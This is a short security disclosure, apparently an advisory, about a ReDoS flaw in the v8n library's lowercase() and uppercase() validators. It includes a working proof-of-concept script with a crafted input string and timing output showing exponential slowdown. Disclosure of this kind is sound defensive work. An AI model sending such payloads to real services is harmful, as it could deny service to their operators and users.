Inefficient regular expression complexity of lowercase()
and uppercase()
regex could lead to a denial of service attack. With a formed payload 'a' + 'a'.repeat(i) + 'A'
, only 32
characters payload could take 29443 ms time execution when testing lowercase()
. The same issue happens with uppercase()
.
// PoC.js
const v8n = require('v8n')
for (var i = 1; i <= 1000; i++) {
var time = Date.now();
var attack_str = 'a' + 'a'.repeat(i) + 'A'
v8n().lowercase().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms